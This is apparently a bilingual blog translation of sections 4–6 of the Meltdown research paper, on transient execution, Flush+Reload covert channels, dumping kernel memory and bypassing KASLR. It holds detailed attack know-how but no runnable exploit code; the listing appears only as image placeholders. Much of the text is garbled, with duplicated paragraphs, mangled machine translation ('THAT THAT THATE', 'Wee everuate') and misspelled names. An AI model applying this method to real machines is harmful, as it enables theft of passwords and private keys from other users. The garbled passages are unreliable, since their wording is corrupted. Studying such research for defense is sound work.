In this work, we bypass the address space isolation mechanism, allowing the attacker to have complete read access to the entire kernel space, which includes the physical memory direct mapping part. With direct mapping, an attacker can access physical memory of any other process and kernel. Note: Kocher et al. [19] are studying a method called Specter attack, which leaks secret information of the target process through speculative execution. Therefore, Specter attacks do not involve privilege escalation as in Meltdown attacks, and need to be customized according to the software environment of the target process. However, spectre will affect more CPUs (as long as the CPU that supports speculative execution will be affected), in addition, KAISER cannot block spectre attacks.
The full Meltdown attack consists of two building blocks, as illustrated in Figure 5. The first building block of Meltdown is to make the CPU execute one or more instructions that would never occur in the executed path. In the toy example (cf. Section 3), this is an access to an array, which would normally never be executed, as the previous instruction always raises an exception. We call such an instruction, which is executed out of order, leaving measurable side effects, a transient instruction. Furthermore, we call any sequence of instructions containing at least one transient instruction a transient instruction sequence.
insert image description here
A complete meltdown attack consists of two components, as shown in the figure above. The first component is to cause the CPU to execute one or more instructions that would never be executed in the normal path. In the simple example code in Chapter 3, the access instruction to the array is arguably not executed, because the preceding instruction always triggers an exception. We call this kind of instruction a transient instruction. The transient instruction is executed by the CPU during out-of-order execution (it will not be executed under normal circumstances), leaving measurable side effects. Furthermore, we refer to any instruction sequence that contains at least one transient instruction as a transient instruction sequence.
In order to leverage transient instructions for an attack, the transient instruction sequence must utilize a secret value that an attacker wants to leak. Section 4.1 describes building blocks to run a transient instruction sequence with a dependency on a secret value
. To complete the attack, the transient instruction sequence must access the secret value that the attacker wants to obtain and exploit. Section 4.1 describes a transient instruction sequence, and we take a closer look at how this instruction uses protected data.
The second building block of Meltdown is to transfer the microarchitectural side effect of the transient instruction sequence to an architectural state to further process the leaked secret. Thus, the second building described in Section 4.2 describes building blocks to transfer a microarchitectural side effect to an architectural state using a covert channel.
Meltdown的第二个组件主要用来检测在瞬态指令序列执行完毕之后,在CPU微架构上产生的side effect。并将其转换成软件可以感知的CPU体系结构的状态,从而将数据泄露出来。因此,在4.2节中描述的第二个组件主要是使用隐蔽信道来把CPU微架构的副作用转换成CPU architectural state。

4.1执行瞬态指令(executing transient instructions)

The first building block of Meltdown is the execution of transient instructions. Transient instructions basically occur all the time, as the CPU continuously runs ahead of the current instruction to minimize the experienced latency and thus maximize the performance (cf. Section 2.1). Transient instructions introduce an exploitable side channel if their operation depends on a secret value. We focus on addresses that are mapped within the attacker’s process, i.e., the user-accessible user space addresses as well as the user-inaccessible kernel space addresses. Note that attacks targeting code that is executed
within the context (i.e., address space) of another process are possible [19], but out of scope in this work, since all physical memory (including the memory of other processes) can be read through the kernel address space anyway.
Meltdown的第一个组件是执行瞬态指令。其实瞬态指令是时时刻刻都在发生的,因为CPU在执行当前指令之外,往往会提前执行当前指令之后的那些指令,从而最大限度地提高CPU性能(参见第2.1节的描述)。如果瞬态指令的执行依赖于一个受保护的值,那么它就引入一个可利用的侧信道。另外需要说明的是:本文主要精力放在攻击者的进程地址空间中,也就是说攻击者在用户态访问内核地址空间的受保护的数据。实际上攻击者进程访问盗取其他进程地址空间的数据也是可能的(不过本文并不描述这个场景),毕竟攻击者进程可以通过内核地址空间访问系统中所有内存,而其他进程的数据也就是保存在系统物理内存的某个地址上。
Accessing user-inaccessible pages, such as kernel pages, triggers an exception which generally terminates the application. If the attacker targets a secret at a user inaccessible address, the attacker has to cope with this exception. We propose two approaches: W with exception handling, we catch the exception effectively occurring after executing the transient instruction sequence, and with exception suppression, we prevent the exception from occurring at all and instead redirect the control flow after executing the transient instruction sequence. We discuss these app roaches in detail in the following.
run Accessing a privileged page, such as a kernel page, while in user mode triggers an exception that usually terminates the application. If the attacker's target is data held at a kernel space address, then the attacker must handle this exception. We propose two methods: One method is to set an exception handling function, which will be called when an exception occurs (the execution of the transient instruction sequence has been completed at this time). The second method is to suppress the firing of exceptions, and we will discuss these methods in detail below.
Exception handling. A trivial approach is to fork the attacking application before accessing the invalid memory location that terminates the process, and only access the invalid memory location in the child process. The CPU executes the transient instruction sequence in the child process before cr ashing. The parent process can then recover the secret by observing the microarchitectural state, eg, through a side-channel.
The program defines its own exception handling function.
A simple method is to perform a fork operation before accessing the kernel address (this operation will trigger an exception and terminate the execution of the program), and only access the kernel address in the child process, triggering an exception. Before the child process crashes, the CPU has executed a transient sequence of instructions. In the parent process, data in the kernel space can be stolen by observing the state of the CPU microarchitecture.
It is also possible to install a signal handler that will be executed if a certain exception occurs, in this specific case a segmentation fault. This allows the attacker to issue the instruction sequence and prevent the application from crashing, reducing the overhead as no new proc ess has to be created.
Of course, you can also set the signal processing function. The signal processing function will be executed after the exception is triggered (in this scenario, the exception is a segmentation fault). The advantage of this method is that the application will not crash, no new process needs to be created, and the overhead is relatively small.
Exception suppression.
This method is related to Transactional memory. Interested students can read the original text by themselves.

4.2 Building a covert channel

The second building block of Meltdown is the transfer of the microarchitectural state, which was changed by the transient instruction sequence, into an architectural state (cf. Figure 5). The transient instruction sequence can be seen as the sending end of a microarchitectural cover channel . The receiving end of the covert channel receives the microarchitectural state change and deduces the secret from the state. Note that the receiver is not part of the transient instruction sequence and can be a different thread or even a different process eg, the parent process in the fork-and-crash approach. The
second Meltdown component is mainly used to convert the information of the CPU microarchitecture state change after executing the transient instruction sequence into the corresponding architecture state (refer to the figure above). The transient instruction sequence can be regarded as the originator of the microarchitecture covert channel, and the receiving end of the channel is used to receive the change information of the microarchitecture state, and deduce the protected data from these state changes. It should be noted that the receiving end is not part of the transient instruction sequence, and can come from other threads or even other processes. For example, in the example where we used fork in the previous section, the transient instruction sequence is in the child process, and the receiving end is in the parent process
We leverage techniques from cache attacks, as the cache state is a microarchitectural state which can be reliably transferred into an architectural state using various techniques [28, 35, 10]. Specifically, we use Flush+Reload [35], as it allows to build a fast and low-noise covert channel. Thus, depending on the secret value, the transient instruction sequence (cf. Section 4.1) performs a regular memory access, eg, as it does in the toy example (cf. Section 3).
We can take advantage of the cache attack technique, by detecting the state of the cache (which is one of the microarchitectural states), we can use various techniques [28, 35, 10] to stably convert it to the CPU architecture state. Specifically, we can use the Flush+Reload technique [35], since this technique allows a fast, low-noise covert channel to be established. Then, based on the secret data, the transient instruction sequence (see Section 4.1) performs a regular memory access, as done in the simple example program given in Section 3.
After the transient instruction sequence accessed an accessible address, ie, this is the sender of the covert channel; the address is cached for subsequent accesses. The receiver can then monitor whether the address has been loaded into the cache by measuring the access time to the address. Thus, the sender can transmit a '1'-bit by accessing an address which is loaded into the monitored cache, and a '0'-bit by not accessing such an address.
At the sender end of the covert channel, the transient command The sequence accesses a normal memory address, causing the data at that address to be loaded into the cache (to speed up subsequent accesses). The receiving end can then monitor whether the data has been loaded into the cache by measuring the access time of the memory address. Therefore, the sender can transmit bit 1 information by accessing the memory address (which will be loaded into the cache), or send bit 0 information by not accessing the memory address (which will not be loaded into the cache). The receiving end can receive the bit 0 or bit 1 information by monitoring the cache information.
Using multiple different cache lines, as in our toy example in Section 3, allows to transmit multiple bits at once. For every of the 256 different byte values, the sender accesses a different cache line. By performing a Flush+Reload attack on all of the 256 possible cache lines, the receiver can recover a full byte instead of just one bit. However, since the Flush+Reload attack takes much longer (typically several hundred cycles) than the transient instruction sequence, transmitting only a single bit at once is more efficient. The attacker can simply do that by shifting and masking the secret value accordingly.
One bit can be transferred using one cacheline, and multiple bits can be transferred simultaneously if multiple different cachelines are used (like our simple example code in Chapter 3). A Byte (8-bit) has 256 different values. For each value, the sender will access a different cache line, so that by performing a Flush+Reload attack on all 256 possible cache lines, the receiver can restore a complete byte instead of a bit. However, since a Flush+Reload attack takes much longer than executing a transient instruction sequence (typically hundreds of cycles), it is more efficient to transmit only one bit. Attackers can use shift and mask to steal confidential data bit by bit.
Note that the covert channel is not limited to microarchitectural states which rely on the cache. Any microarchitectural state which can be influenced by an instruction (sequence) and is observable through a side channel can be used to build the sending end of a covert channel. The sender could, for example, issue an instruction (sequence) which occupies a certain execution port such as the ALU to send a ‘1’-bit. The receiver measures the latency when executing an instruction (sequence) on the same execution port. A high latency implies that the sender sends a ‘1’-bit, whereas a low latency implies that sender sends a ‘0’-bit. The advantage of the Flush+ Reload cache covert channel is the noise resistance and the high transmission rate [10]. Furthermore, the leakage can be observed from any CPU core [35], i.e., rescheduling events do not significantly affect the covert channel.
A word of caution: covert channels do not always rely on caching. As long as the CPU microarchitectural state is affected by transient instruction sequences, and this state change can be observed through the side channel, then the microarchitectural state can be used to construct the sender of the covert channel. For example, the sending end can execute an instruction (the instruction will occupy the port of the relevant execution unit (such as ALU)) to send a "1" bit. The receiving end can execute instructions on the same execution unit port while measuring the time delay. High latency means the sender sends a "1" bit, and low latency means the sender sends a "0" bit. The advantage of Flush+Reload covert channel is noise immunity and high transmission rate [10]. Furthermore, we can observe data leakage [35] from any CPU core, i.e. scheduling events do not significantly affect the covert channel.

5. Meltdown

In this section, present Meltdown, a powerful attack allowing to read arbitrary physical memory from an unprivileged user program, comprised of the building blocks presented in Section 4. First, we discuss the attack setting to emphasize the wide applicability of this attack. Second, we present an attack overview, showing how Meltdown can be mounted on both Windows and Linux on personal computers as well as in the cloud. Finally, we discuss a concrete implementation of Meltdown allowing to dump kernel memory with up to 503KB/s.
Here In the first chapter, we will show you the power of meltdown: read physical memory anywhere in the system through a common user program. The frame diagram of the whole attack process has been described in Chapter 4. First, we discuss the attack settings. Through the settings, we can see that the attack of meltdown has a very wide range of applicability. Second, we give an overview of the meltdown attack and show how it works against Windows and Linux PCs as well as cloud servers. Finally, we discuss a specific implementation of Meltdown that allows dumping kernel-space memory at a rate of 503 kB/s.
insert image description here
Attack setting.
In our attack, we consider personal computers and virtual machines in the cloud. In the attack scenario, the attacker has arbitrary unprivileged code execution on the attacked system, i.e., the attacker can run any code with the privileges of a normal user. However, the attacker has no physical access to the machine. Further, we assume that the system is fully protected with state-of-the-art software-based defenses such as ASLR and KASLR as well as CPU features like SMAP, SMEP, NX, and PXN. Most importantly, we assume a completely bug-free operating system, thus, no software vulnerability exists that can be exploited to gain kernel privileges or leak information. The attacker targets secret user data, e.g., passwords and private keys, or any other valuable information.
攻击设定如下:
We consider two application scenarios on personal computers and virtual machines on cloud servers. During the attack, the attacker only uses unauthorized code to attack the system, that is to say, the attacker can only run the code with the authority of an ordinary user. Also, the attacker does not have physical access to the machine. Further, we assume that the system we are going to attack already has very good software-based defenses, such as ASLR and KASLR, and the CPU also contains functions such as SMAP, SMEP, NX, and PXN. Most importantly, we assume that the attacked system is a completely bug-free operating system, with no software vulnerabilities that can be exploited to gain root privileges or leak information. Attackers target users' secret data, such as passwords and private keys, or any other valuable information.

5.1 Overview

Meltdown combines the two building blocks discussed in Section 4. First, an attacker makes the CPU execute a transient instruction sequence which uses an inaccessible secret value stored somewhere in physical memory (cf. Section 4.1). The transient instruction sequence acts as the transmitter of a covert channel (cf. Section 4.2), ultimately leaking the secret value to the attacker.
Meltdown使用了第4章中讨论攻击架构图。首先,攻击者让CPU执行一个瞬态指令序列,该指令序列会操作保存在物理内存中不可访问的秘密数据(参见第4.1节)。瞬态指令序列充当隐蔽通道的发送端(参见第4.2节),最终将秘密数据泄漏给攻击者。
Meltdown consists of 3 steps:
Step 1 The content of an attacker-chosen memory location,which is inaccessible to the attacker, is loaded into a register.
Step 2 A transient instruction accesses a cache line based on the secret content of the register.
Step 3 The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location.
By repeating these steps for different memory locations, the attacker can dump the kernel memory, including the entire physical memory.
Meltdown攻击包括3个步骤:
步骤1:攻击者访问秘密数据所在的内存位置(该内存是攻击者没有权限访问的),并加载到一个寄存器中。
步骤2,瞬态指令基于寄存器中保存的秘密数据内容访问cache line。
步骤3:攻击者使用Flush+Reload来确定在步骤2中访问的cache line,从而恢复在步骤1中读取的秘密数据。
在不同的内存地址上不断重复上面的步骤,攻击者可以dump整个内核地址空间的数据,这也就包括了整个物理内存。
Listing 2 shows the basic imageration of the transition insertion sequence and the sending part of the cover, the use x86 Assembly Instructor. Note That THAT THAT THATE THATE THATE His Part of the Atlk Could Also Be Implemented Entirely in Higher Level LanguageS Like C. in the Following, We Will discuss each step of Meltdown and the corresponding code line in Listing 2.
clip_image012
The above listing shows the transient instruction sequence and the basic implementation of the covert channel send section (using x86 assembly instructions). It should be noted that the code of this part of the attack can also be completely implemented in a high-level language such as C. In subsequent articles, we will discuss how each line of code in the list accomplishes the meltdown attack.
Step 1: Reading the secret. To load data from the main memory into a register, the data in the main memory is referenced using a virtual address. In parallel to translating a virtual address into a physical address, the CPU also checks the permission bits of the virtual address, i.e., whether this virtual address is user accessible or only accessible by the kernel. As already discussed in Section 2.2, this hardware-based isolation through a permission bit is considered secure and recommended by the hardware vendors. Hence, modern operating systems always map the entire kernel into the virtual address space of every user process.
Step 1: Read secret data in memory. To load data from main memory into registers, we use virtual addresses to access data in main memory. While converting the virtual address to a physical address, the CPU also checks the permission bit of the virtual address: whether this virtual address can be accessed by user mode, or can only be accessed in kernel mode. As already discussed in Section 2.2, we agree that this hardware-based address space isolation is safe and is recommended by hardware vendors. Therefore, modern operating systems always map the entire kernel address space into the virtual address space of each user process.
As a consequence, all kernel addresses lead to a valid physical address when translating them, and the CPU can access the content of such addresses. The only difference to accessing a user space address is that the CPU raises an exception as the current permission level does not allow to access such an address. Hence, the user space cannot simply read the contents of such an address. However, Meltdown exploits the out-of-order execution of modern CPUs, which still executes instructions in the small time window between the illegal memory access and the raising of the exception.
When accessing the kernel address space, as long as the virtual address mapping is created (that is, a valid physical address can be translated through the page table), the CPU can access the contents of these addresses. The only difference from accessing the user address space is that a permission check will be performed, and an exception will be triggered when accessing a kernel space address because the current CPU permission level is not enough. Therefore, user space cannot obtain secret data simply by reading the contents of a kernel address. However, the nature of out-of-order execution allows the CPU to continue executing instructions within a small time window (from executing an illegal memory access instruction to triggering an exception). Meltdown uses the out-of-order execution feature to complete the attack.
In line 4 of Listing 2, we load the byte value located at the target kernel address, stored in the RCX register, into the least significant byte of the RAX register represented by AL. As explained in more detail in Section 2.1, the MOV instruction is fetched by the core, decoded into μOPs, allocated, and sent to the reorder buffer. There, architectural registers (e.g., RAX and RCX in Listing 2) are mapped to underlying physical registers enabling out-of-order execution. Trying to utilize the pipeline as much as possible, subsequent instructions (lines 5-7) are already decoded and allocated as μOPs as well. The μOPs are further sent to the reservation station holding the μOPs while they wait to be executed by the corresponding execution unit. The execution of a μOP can be delayed if execution units are already used to their corresponding capacity or operand values have not been calculated yet.
In line 4 in the above code list, we access the memory located in the kernel address space (the address is stored in the RCX register), obtain a byte of data, and store it in the AL register (that is, the 8 LSB bits of the RAX register). According to the description in Section 2.1, the MOV instruction is fetched by the CPU core, decoded into μOPS, allocated and sent to the reorder buffer. There, architectural registers (software-visible registers, such as RAX and RCX) are mapped to the underlying physical registers for out-of-order execution. In order to take advantage of the pipeline as much as possible, subsequent instructions (5-7 codes) have been decoded and allocated as uOPs. The uOPs will be further sent to the reservation station (temporary storage uOPs). In the reservation station, the uOPs will wait for the corresponding execution unit to be free. If the execution unit is ready, the uOPs will be executed immediately. If the execution unit has reached the upper limit of capacity ( For example, if there are 3 adders, then 3 addition operations can be performed at the same time, and the fourth addition uOPs needs to wait) or the value of the uOPs operand has not been calculated, and the uOPs are delayed.
When the kernel address is loaded in line 4, it is likely that the CPU already issued the subsequent instructions as part of the out-or-order execution, and that their corresponding μOPs wait in the reservation station for the content of the kernel address to arrive. As soon as the fetched data is observed on the common data bus, the μOPs can begin their execution.
When loading the kernel address into the register in line 4 of the program, due to out-of-order execution, it is likely that the CPU has already issued subsequent instructions, and their corresponding μOPs will wait in the reservation station for the contents of the kernel address to arrive. These μOPs begin execution as soon as the fetched core address data is observed on the common data bus.
When the μOPs finish their execution, they retire in order, and, thus, their results are committed to the architectural state. During the retirement, any interrupts and exception that occurred during the execution of the instruction are handled. Thus, if the MOV instruction that loads the kernel address is retired, the exception is registered and the pipeline is flushed to eliminate all results of subsequent instructions which were executed out of order. However, there is a race condition between raising this exception and our attack step 2 w hich we describe below.
When the μOPs are executed, they retire in order (this term is called retire, which is difficult to translate, so I won’t translate it here, but it has the same meaning as commit), so the results of the μOPs will be submitted and reflected in the architectural state superior. During commit, any interruptions and exceptions that occur during the execution of instructions are handled. Therefore, when the MOV instruction is submitted, it is found that the instruction operates on the kernel address, and an exception will be triggered at this time. At this time, the CPU pipeline will execute the flush operation, and the results of those instructions (after the Mov instruction) executed in advance due to out-of-order execution will be cleared. However, there is a race condition between triggering this exception and our execution of attack step 2, which we describe below.
As reported by Gruss et al. [9], prefetching kernel addresses sometimes succeeds. We found that prefetching the kernel address can slightly improve the performance of the attack on some systems. According to the research of Gruss et al. [9], prefetching the kernel
address sometimes successfully. We found that prefetching kernel addresses can slightly improve attack performance on some systems.
Step 2: Transmitting the secret. The instruction sequence from step 1 which is executed out of order has to be chosen in a way that it becomes a transient instruction sequence. If this transient instruction sequence is executed before the MOV instruction is retired (ie, raises the exception), and the transient instruction sequence performed computations based on the secret, it can be utilized to transmit the secret to the attacker.
Step 2:
Whether the instruction sequence performed out of order in step 1 can become transient Instruction sequences are conditional. If it is indeed a transient instruction sequence, it must be executed before the MOV instruction retirement (that is, before triggering an exception), and the transient instruction sequence will be calculated based on secret data, and the side effects of this calculation can be used to send to the attacker Pass secret data.
As already discussed, we utilize cache attacks that allow to build fast and low-noise covert channel using the CPU's cache. Thus, the transient instruction sequence has to encode the secret into the microarchitectural cache state, similarly to the toy example in Section 3.
As already discussed, we exploit cache attacks, which utilize the CPU's cache memory to establish a fast and low-noise covert channel. Then, the transient instruction sequence must encode the secret data in the microarchitectural cache state. This process is similar to the simple example program in Section 3.
We allocate a probe array in memory and ensure that no part of this array is cached. To transmit the secret, the transient instruction sequence contains an indirect memory access to an address which is calculated based on the secret (inaccessible) value. In line 5 of Listing 2 the secret value from step 1 is multiplied by the page size, i.e., 4 KB. The multiplication of the secret ensures that accesses to the array have a large spatial distance to each other. This prevents the hardware prefetcher from loading adjacent memory locations into the cache as well. Here, we read a single byte at once, hence our probe array is 256×4096 bytes, assuming 4KB pages.
We allocate an array of probes in memory and make sure that none of the array's memory is cached. To pass secret data, the transient instruction sequence contains indirect memory accesses to probe arrays based on that secret data (which is inaccessible to userland). For details, please refer to the fifth line of code in the above list: the secret data obtained in step 1 will be multiplied by the page size, which is 4 KB (the code uses a shift operation, which has the same meaning). This multiplication operation ensures that accesses to the array have large spatial distances. This prevents the hardware prefetcher from loading adjacent memory locations into the cache. In this example, since only one byte is read at a time, our probe array is 256 x 4096 bytes (assuming a 4KB page size).
Note that in the out-of-order execution we have a noise-bias towards register value ‘0’. We discuss the reasons for this in Section 5.2. However, for this reason, we introduce a retry-logic into the transient instruction sequence. In case we read a ‘0’, we try to read the secret again (step 1). In line 7, the multiplied secret is added to the base address of the probe array, forming the target address of the covert channel. This address is read to cache the corresponding cache line. Consequently, our transient instruction sequence affects the cache state based on the secret value that was read in step 1.
Note: In out-of-order execution, we have a noise-bias to the register value "0". We discuss the specific reasons in Section 5.2. It is for this reason that we have introduced retry logic in transient instruction sequences. If we read "0" value, we try to re-read the secret data (step 1). In line 7 of the code, the secret data is multiplied by 4096 and accumulated into the base address of the probe array, thus forming the target address of the covert channel. Reading the target address can load data into the corresponding cacheline. Therefore, the transient instruction sequence modifies the cache state corresponding to the probe array according to the secret data read in step 1.
SINCE The Transient Instructor Sequence in Step 2 Races Against Raising The Exception, Reducing the Runtime of Step 2 Can Significantly the Performance of The Attack. For Instance, TAKING CAR performance on some systems.
Since the transient instruction sequence in step 2 needs to compete with the triggering of the exception, reducing the running time of step 2 can significantly improve the performance of the attack. For example: pre-caching the address translation of the detection array in the TLB.
Step 3: Receiving the secret. In step 3, the attacker recovers the secret value (step 1) by leveraging a microarchitectural side-channel attack (ie, the receiving end of a microarchitectural covert channel) that transfers the cache state (step 2) back into an architectural state. As discussed in Section 4.2, Meltdown relies on Flush+Reload to transfer the cache state into an architectural state.
Step 3: Receive secret data.
In step 3, the attacker uses a microarchitecture side-channel attack (that is, the receiving end of the microarchitecture covert channel) to convert the cache state into an architectural state that software can perceive, thereby recovering the secret data. As discussed in Section 4.2, meltdown relies on Flush+Reload to convert cache state to CPU architectural state.
When the transient instruction sequence of step 2 is executed, exactly one cache line of the probe array is cached. The position of the cached cache line within the probe array depends only on the secret which is read in step 1. Thus, the attacker iterates over all 256 pages of the probe array and measures the access time for every first cache line (ie, offset) on the page. The number of the page containing the cached cache line corresponds directly to the secret value. Executed in step
2 During the transient instruction sequence, only one cacheline of the entire probe array is loaded. The position of the loaded cacheline in the probe array depends only on the secret data read in step 1. Therefore, the attacker traverses all 256 pages in the detection array, and tests the access time of the first cacheline of each page. The page index that has preloaded the cacheline directly corresponds to the value of the secret data.
Dumping the entire physical memory. By repeating all 3 steps of Meltdown, the attacker can dump the entire memory by iterating over all different addresses. However, as the memory access to the kernel address raises an exception that terminates the program, we use one of the methods described in Section 4.1 to handle or suppress the exception.
Dump the entire physical memory:
By repeating the above 3 steps and modifying different attack addresses at the same time, the attacker can dump all the memory. However, since a memory access to a kernel address raises an exception that terminates the program, we use the methods described in Section 4.1 to handle or suppress this exception.
As all major operating systems also typically map the entire physical memory into the kernel address space (cf. Section 2.2) in every user process, Meltdown is not only limited to reading kernel memory but it is capable of reading the entire physical memory of the tar get machine.
In all current mainstream operating systems, we usually map the entire physical memory to the kernel address space (see Section 2.2), and each user process includes a part of the kernel address space. Therefore, Meltdown can not only read the memory value of the kernel address space, but also read the physical memory of the entire system.

5.2 Optimizations and limitations

The case of 0. If the exception is triggered while trying to read from an inaccessible kernel address, the register where the data should be stored, appears to be zeroed out. This is reasonable because if the exception is unhandled, the user space application is terminated, and the value from the inaccessible kernel address could be observed in the register contents stored in the core dump of the crashed process. The direct solution to fix this problem is to zero out the corresponding registers. If the zeroing out of the register is faster than the execution of the subsequent instruction (line 5 in Listing 2), the attacker may read a false value in the third step. To prevent the transient instruction sequence from continuing with a wrong value, i.e., ‘0’, Meltdown retries reading the address until it encounters a value different from ‘0’ (line 6). As the transient instruction sequence terminates after the exception is raised, there is no cache access if the secret value is 0. Thus, Meltdown assumes that the secret value is indeed ‘0’ if there is no cache hit at all.
The scene where the reading value is 0.
According to the previous description, in the instruction commit phase, when it is detected that the user mode accesses the kernel address, in addition to triggering an exception, the CPU will also clear the operation result of the instruction, that is to say, the AL register will be cleared. If the transient instruction sequence fails in the race with the exception (register clearing occurs earlier than line 5 in the program listing above), then it is likely that what is read from the kernel address is not the actual value but the cleared value . It is also reasonable to clear the register, because if the exception is not handled, the application in user space will terminate, and the core dump file of the process will retain the contents of the register. If it is not cleared, the data in the kernel space can pass through the core dump. Documents leaked out. Clearing can correct this issue and ensure the security of kernel space data. In order to prevent the transient instruction sequence from continuing to operate on the wrong "0" value, Meltdown will reread the address until it reads a non-"0" value (line 6).
You may ask: what if the secret data is 0? In fact, when the exception is triggered, the execution of the transient instruction sequence is terminated. If the secret data is indeed equal to 0, no cacheline is loaded. Therefore, during meltdown's probing data cacheline scan, if there is no cacheline hit, the secret data is actually "0".
The loop is terminated by either the read value not being ‘0’ or by the raised exception of the invalid memory access. Note that this loop does not slow down the attack measurably, since, in either case, the processor runs ahead of the illegal memory access, regardless of whether ahead is a loop or ahead is a linear control flow. In either case, the time until the control flow returned from exception handling or exception suppression remains the same with and without this loop. Thus, capturing read ‘0’s beforehand and recovering early from a lost race condition vastly increases the reading speed.
无论是读出数值非“0”或无效地址访问触发了异常,代码中的循环逻辑都会终止。注意,这个循环不会降低攻击的性能,因为,在上面两种情况中,CPU会提前允许非法内存访问指令之后的代码指令,而CPU并不关心这些指令是一个循环控制或是一个线性的控制流。无论哪一种情况,从异常处理函数(或者异常抑制)返回的时间都是一样的,和有没有循环控制是无关的。因此,尽早发现读出值是“0”,也就是说尽早发现自己在和异常的竞争中失败并恢复,可以大大提高了读取速度。
Single-bit transmission :
In the attack description in Section 5.1, the attacker transmitted 8 bits through the covert channel at once and performed 28 = 256 Flush+Reload measurements to recover the secret. However, there is a clear trade-off between running more transient instruction sequences and performing more Flush+Reload measurements. The attacker could transmit an arbitrary number of bits in a single transmission through the covert channel, by either reading more bits using a MOV instruction for a larger data value. Furthermore, the attacker could mask bits using additional instructions in the transient instruction sequence. We found the number of additional instructions in the transient instruction sequence to have a negligible influence on the performance of the attack.
单个bit数据的发送:
In the description in Section 5.1, the attacker can transmit 8 bits at a time through the covert channel, and the receiving end executes 2^8=256 Flush+Reload commands to recover the secret data. However, we need to strike a balance between running more transient instruction sequences and performing more Flush+Reload measurements. An attacker can send arbitrary bits of data in one transmission through a covert channel, of course, this requires the use of the MOV instruction to read more bits of secret data. In addition, the attacker can increase the operation of the mask in the transient instruction sequence (so that fewer bits can be transmitted, thereby reducing the number of Flush+Reload at the receiving end). We find that increasing the number of instructions in a transient instruction sequence has a negligible performance impact on the attack.
The performance bottleneck in the generic attack description above is indeed, the time spent on Flush+Reload measurements. In fact, with this implementation, almost the entire time will be spent on Flush+Reload measurements. By transmitting only a single bit, we can omit all but one Flush+Reload measurement, ie, the measurement on cache line 1. If the transmitted bit was a '1', then we observe a cache hit on cache line 1. Otherwise, we observe no cache hit on cache line 1 .
The performance bottleneck in the meltdown attack described above is mainly the time spent on restoring secret data through Flush+Reload. In fact, in the meltdown code implementation in this chapter, almost all the time will be spent on Flush+Reload. If only one bit is sent, we can ignore everything except for one Flush+Reload measurement time. In this case, we only need to check the status of a cacheline, if the cache hit, then the transmitted bit is "1", if the cache miss, then the transmitted bit is "0".
Transmitting only a single bit at once also has drawbacks. As described above, our side channel has a bias towards a secret value of '0'. If we read and transmit multiple bits at once, the likelihood that all bits are '0' may quite small for actual user data. The likelihood that a single bit is '0' is typically close to 50 %. Hence, the number of bits read and transmitted at once is a tradeoff between some implicit error-reduction and the overall transmission rate of the cover channel.
Transmitting only one bit at a time also has disadvantages. As mentioned above, our side channel is more biased towards "0" values. If we read multiple bits of secret data at a time and send them out, the chances of all bits being "0" should be said to be fairly small. The probability of a single bit being equal to "0" is usually close to 50%. Therefore, the number of bits transmitted at one time needs to be balanced between the total transmission rate of the covert channel and the reduction of errors. However, since the error rates are quite small in either case, our evaluation
(cf. Section 6) is based on the single-bit transmission mechanics.
See Section 6) is based on a single-bit transmission mechanism.
Exception Suppression using Intel TSX.
It is related to Intel's TSX, and I am not interested in understanding it for the time being.
Dealing with KASLR.
In 2013, kernel address space layout randomization (KASLR) had been introduced to the Linux kernel (starting from version 3.14 [4]) allowing to randomize the location of the kernel code at boot time. However, only as recently as May 2017, KASLR had been enabled by default in version 4.12 [27]. With KASLR also the direct-physical map is randomized and, thus, not fixed at a certain address such that the attacker is required to obtain the randomized offset before mounting the Meltdown attack. However , the randomization is limited to 40 bit.
Processing KASLR.
In 2013, Kernel Address Space Layout Randomization (KASLR) has been incorporated into the Linux kernel (starting from version 3.14 [4]), this feature allows the kernel code to be loaded at a randomized address at boot time. In the recent (May 2017) version 4.12 kernel, KASLR has been enabled by default [27]. And the address of the direct mapping part is also random, not fixed at a certain address. Therefore, before using the meltdown vulnerability to attack the kernel, the attacker needs to obtain a 40-bit random offset value.
Thus, if we assume a setup of the target machine with 8GB of RAM, it is sufficient to test the address space for addresses in 8GB steps. This allows to cover the search space of 40 bit with only 128 tests in the worst case. If The attacker can successfully obtain a value from a tested address, the attacker can proceed dumping the entire memory from that location. This allows to mount Meltdown on a system despite being protected by KASLR within seconds. Suppose the target machine has 8GB memory, then we
actually It is possible to use the step size of 8G to detect the address space. Even in the worst case there are only 128 times to determine this 40-bit random offset value. Once an attacker can successfully attack a test address, he can also continue to dump the entire memory from that location. Although the system is protected by KASLR, in fact exploiting the meltdown vulnerability, the attacker can also complete the attack in a few seconds.

6. Evaluation

In this section, wee everuate Meltdown and the Performance of Our Proof-OF-Concept Implementation 2. Section 6.1 Discusses the Information Which Meltdown Can Leak, And section 6.2 Evaluates the Performance of Meltdown, Including Counters. Finally, We Discous Limitations for AMD and AND ARM in Section 6.4.
In this chapter, we will evaluate the impact of meltdown and the performance of our POC (proof-of-concept) implementation. Section 6.1 discusses the information that meltdown may leak, and Section 6.2 evaluates meltdown performance and countermeasures. Finally in Section 6.4 we discuss the limitations of meltdown on AMD and ARM processors.
insert image description here
Table 1 shows a list of configurations on which we successfully reproduced Meltdown. For the evaluation of Meltdown, we used both laptops as well as desktop PCs with Intel Core CPUs. For the cloud setup, we tested Meltdown in virtual machines running on Intel Xeon CPUs hosted in the Amazon Elastic Compute Cloud as well as on DigitalOcean. Note that for ethical reasons we did not use Meltdown on addresses referring to physical memory of other tenants. clip_image014In the systems listed above, we have successfully exploited the Meltdown
vulnerability
for attacked. We evaluate meltdown on laptops and desktops using Intel CPUs. For cloud servers, we test virtual machines from Amazon Elastic Compute Cloud and DigitalOcean, and the CPUs are Intel Xeon processors. For ethical reasons, we do not use meltdown to fetch data at real user physical memory addresses.

6.1 Information Leakage in Various Environments (Leakage and Environments)

We evaluated Meltdown on both Linux (cf. Section 6.1.1) and Windows 10 (cf. Section 6.1.3). On both operating systems, Meltdown can successfully leak kernel memory. Furthermore, we also evaluated the effect of the KAISER patches on Meltdown on Linux, to show that KAISER prevents the leakage of kernel memory (cf. Section 6.1.2). Finally, we discuss the information leakage when running inside containers such as Docker (cf. Section 6.1.4)
. Meltdown vulnerabilities were evaluated on two operating systems, see Section 6.1.1) and Windows 10 (see Section 6.1.3), and showed that both of them can successfully leak kernel information. In addition, we also tested the effect of the KAISER patch on Linux, and the results show that the KAISER patch can prevent kernel information leakage (see Section 6.1.2). Finally, we discuss information leakage in container environments such as Docker (see Section 6.1.4).

6.1.1Linux

